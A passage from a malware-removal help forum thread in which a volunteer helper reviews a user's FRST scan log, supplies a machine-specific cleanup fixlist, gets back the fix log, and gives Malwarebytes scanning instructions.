2015-01-28 12:03 - 2009-07-13 23:45 - 00021280 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-28 12:02 - 2009-07-14 00:13 - 00880194 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-01-28 01:50 - 2014-06-23 14:09 - 00003026 _____ () C:\Windows\System32\Tasks\MSIAfterburner
2015-01-27 23:20 - 2012-03-24 07:57 - 00000000 ____D () C:\Windows\pss
2015-01-27 19:22 - 2013-10-12 14:32 - 00000880 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
2015-01-27 14:59 - 2012-03-24 06:27 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\uTorrent
2015-01-26 23:23 - 2012-12-22 23:09 - 00002356 _____ () C:\Users\Tom Jones\Desktop\Google Chrome.lnk
2015-01-26 18:28 - 2013-10-20 16:08 - 00000000 ____D () C:\Users\Tom Jones\Documents\FIFA 14
2015-01-26 17:34 - 2014-07-01 00:35 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-01-26 17:33 - 2013-04-16 15:24 - 00000000 ____D () C:\Users\Tom Jones\AppData\Local\Apps\2.0
2015-01-26 00:51 - 2013-11-02 00:19 - 00000799 _____ () C:\Users\Tom Jones\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2015-01-25 19:07 - 2009-07-13 21:34 - 00000215 _____ () C:\Windows\system.ini
2015-01-24 20:11 - 2014-10-20 21:28 - 00272296 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2015-01-24 20:11 - 2014-10-20 21:28 - 00176552 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2015-01-24 20:11 - 2014-10-20 21:28 - 00176552 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2015-01-24 20:11 - 2014-10-20 21:28 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2015-01-24 20:11 - 2014-10-20 21:28 - 00000000 ____D () C:\Program Files (x86)\Java
2015-01-24 20:11 - 2014-02-22 13:06 - 00319912 _____ (Oracle Corporation) C:\Windows\system32\javaws.exe
2015-01-24 20:11 - 2014-02-22 13:06 - 00191400 _____ (Oracle Corporation) C:\Windows\system32\javaw.exe
2015-01-24 20:11 - 2014-02-22 13:06 - 00190888 _____ (Oracle Corporation) C:\Windows\system32\java.exe
2015-01-24 20:11 - 2014-02-22 13:06 - 00111016 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2015-01-24 20:11 - 2014-02-22 13:06 - 00000000 ____D () C:\Program Files\Java
2015-01-24 20:11 - 2013-11-17 13:41 - 00000000 ____D () C:\ProgramData\Oracle
2015-01-24 12:23 - 2014-12-27 13:56 - 00000000 ____D () C:\Users\Tom%20Jones
2015-01-24 12:23 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Default
2015-01-24 02:00 - 2013-04-16 15:24 - 00000000 ____D () C:\Users\Tom Jones\AppData\Local\Deployment
2015-01-23 20:49 - 2012-12-22 23:33 - 00000000 ____D () C:\Users\Tom Jones\AppData\Local\CRE
2015-01-23 19:49 - 2012-03-24 10:07 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\FileZilla
2015-01-23 19:08 - 2013-12-21 00:56 - 00000000 ____D () C:\Users\Tom Jones\Documents\visual studio 2013
2015-01-23 16:54 - 2012-03-24 07:32 - 00000000 ____D () C:\Users\Tom Jones\AppData\Local\Downloaded Installations
2015-01-23 16:42 - 2013-11-13 23:06 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\SSH
2015-01-23 13:47 - 2009-07-13 22:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2015-01-23 00:11 - 2013-04-09 23:28 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LastPass
2015-01-22 22:05 - 2012-03-24 05:03 - 00000000 ____D () C:\Users\Tom Jones
2015-01-22 21:11 - 2014-07-01 00:35 - 00097496 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-01-22 20:55 - 2014-05-05 00:51 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-01-22 20:55 - 2012-07-03 13:41 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-01-20 23:10 - 2012-03-25 05:33 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\MiniLyrics
2015-01-20 00:31 - 2012-03-24 06:03 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\Adobe
2015-01-14 01:56 - 2013-07-22 20:27 - 00000000 ____D () C:\ProgramData\Codemasters
2015-01-14 01:56 - 2013-07-08 22:24 - 00000000 ____D () C:\Users\Tom Jones\Documents\My Games
2015-01-12 14:50 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\tracing
2015-01-12 01:18 - 2012-10-24 23:13 - 00000000 ____D () C:\Windows\SysWOW64\directx
2015-01-06 13:14 - 2012-10-07 15:51 - 00000600 _____ () C:\Users\Tom Jones\AppData\Local\PUTTY.RND
2014-12-31 06:14 - 2010-11-20 22:27 - 00298120 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
 
==================== Files in the root of some directories =======
 
2014-01-04 23:40 - 2014-01-04 23:42 - 0001252 _____ () C:\Users\Tom Jones\AppData\Roaming\AutoTagLog.log
2014-01-04 23:31 - 2014-01-04 23:43 - 0000888 _____ () C:\Users\Tom Jones\AppData\Roaming\RegistrationLog.log
2014-05-29 16:14 - 2014-06-25 21:00 - 0008192 _____ () C:\Users\Tom Jones\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-07-01 18:05 - 2013-07-01 18:05 - 0000001 _____ () C:\Users\Tom Jones\AppData\Local\llftool.4.30.agreement
2012-10-07 15:51 - 2015-01-06 13:14 - 0000600 _____ () C:\Users\Tom Jones\AppData\Local\PUTTY.RND
2015-01-27 22:54 - 2015-01-27 22:54 - 0000739 _____ () C:\Users\Tom Jones\AppData\Local\recently-used.xbel
2012-03-26 17:26 - 2013-08-27 20:52 - 0007602 _____ () C:\Users\Tom Jones\AppData\Local\resmon.resmoncfg
2015-01-27 22:06 - 2015-01-27 22:06 - 0000057 _____ () C:\ProgramData\Ament.ini
 
Some content of TEMP:
====================
C:\Users\Tom Jones\AppData\Local\Temp\Quarantine.exe
C:\Users\Tom Jones\AppData\Local\Temp\sqlite3.dll
C:\Users\Tom Jones\AppData\Local\Temp\uttB576.tmp.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-01-24 13:10
 
==================== End Of Log ============================


#12 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 28 January 2015 - 03:45 PM

Hi TomFullerton-
 
 
I issued you a P2P warning in an earlier post:
 

 
 

It is pretty much certain that if you continue to use P2P programs, you will get infected again.


I would recommend that you uninstall uTorrent, however that choice is up to you  If you wish to keep it, please do not use it until your computer is cleaned.

 
You are downloading more torrents.  You are going to re infect yourself before your machine is even clean.  :wink:  As requested in my P2P warning please stop downloading torrents during this fix.
 
 ---------------------------------------------------------------------------------

 Please copy and paste the contents of the code box below into a notepad file and save it as Fixlist.txt  to the location where your FRST.exe file is located.
 
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\RunOnce: [Adobe Speed Launcher] => 1422473019
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
EmptyTemp:
 
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
 
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
 
Run FRST/FRST64 and press the Fix button just once and wait.
 
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
 
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
 
 ======================================================
 
IN YOUR NEXT REPLY I NEED:
 
1.) Your Fixlist log
 
 
Thanks  :)

avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#13 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 31 January 2015 - 02:12 PM

Hello TomFullerton-

 

It has been almost 3 days since your last reply.  Do you still need help?  If so please follow the instructions in my previous post otherwise this thread will be closed.

 

Thanks :)


avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#14 tomfullerton

tomfullerton
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:21 PM

Posted 01 February 2015 - 01:31 AM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 28-01-2015
Ran by Tom Jones at 2015-01-28 23:17:24 Run:3
Running from C:\Users\Tom Jones\Downloads
Loaded Profiles: Tom Jones (Available profiles: Tom Jones)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\RunOnce: [Adobe Speed Launcher] => 1422473019
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
EmptyTemp:
*****************
 
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\\Adobe Speed Launcher => value deleted successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
EmptyTemp: => Removed 537.2 MB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog 23:17:38 ====


#15 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 01 February 2015 - 11:37 AM

Hi TomFullerton-
 
Please download Malwarebytes Anti-Malware   and save it to your desktop.
§  Double-click on the setup file (mbam-setup.exe), then click on Run to install.
§  Malwarebytes will automatically open to it's Dashboard. If you have never run this version, you should see a red note at the top indicating "A scan has never been run on your system"
 

§  Click on Update Now to download the current database definitions, then click the Scan Now >> button.
 

§  If you have run this version before, you should see a green note at the top indicating "Your system is fully protected".
§  You will be prompted to update Malwarebytes...click on the Update Now button..
§  The THREAT SCAN will automatically begin..
§  When the scan has completed, the results will be displayed. Click on Quarantine All, then click on Apply Actions.
 

§  To complete any actions taken you will be prompted to restart your computer...click on YesFailure to reboot normally will prevent Malwarebytes from removing all the malware.
 
§  After rebooting the computer, copy and past the mbam.log in your next reply.
.
To retrieve the Malwarebytes Anti-Malware 2.0 scan log information (Method 1)

§  Open Malwarebytes Anti-Malware.
§  Click the History Tab at the top and select Application Logs.
§  Select (check) the box next to Scan Log. Choose the most current scan.
§  Click the View button.
§  Click Copy to Clipboard at the bottom...come back to this thread, click Add Reply, then right-click and choose Paste.
§  Alternatively, you can click Export and save the log as a .txt file on your Desktop or another location.
§  Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
To retrieve the Malwarebytes Anti-Malware 2.0 scan log information (Method 2)
§  Open Malwarebytes Anti-Malware.
§  Click the Scan Tab at the top.
§  Click the View detailed log link on the right.
§  Click Copy to Clipboard at the bottom...come back to this thread, click Add Reply, then right-click and choose Paste.
§  Alternatively, you can click Export and save the log as a .txt file on your Desktop or another location.
§  Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
Logs are named by the date of scan in the following format: mbam-log-yyyy-mm-dd and automatically saved to the following locations:
-- XP: C:\Documents and Settings\<Username>\Application Data\Malwarebytes\Malwarebytes Anti-Malware\Logs\mbam-log-yyyy-mm-dd
-- Vista, Windows 7/8: C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\Logs\mbam-log-yyyy-mm-dd

 
 ------------------------------------------------------------------
 
Please make sure the additions.txt option is checked, re run FRST, just the scan not the fix, and post both the logs.
 
 
 ----------------------------------------------------------------------------
 
IN YOUR NEXT REPLY I NEED:
 
1.) MBAM Log
2.) FRST Logs
3.) How is your system running now?  Are you experiencing some,  all, some, or none of your previous issues
 
 
Thanks  :)


Edited by Johnny Computer, 01 February 2015 - 04:31 PM.

avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users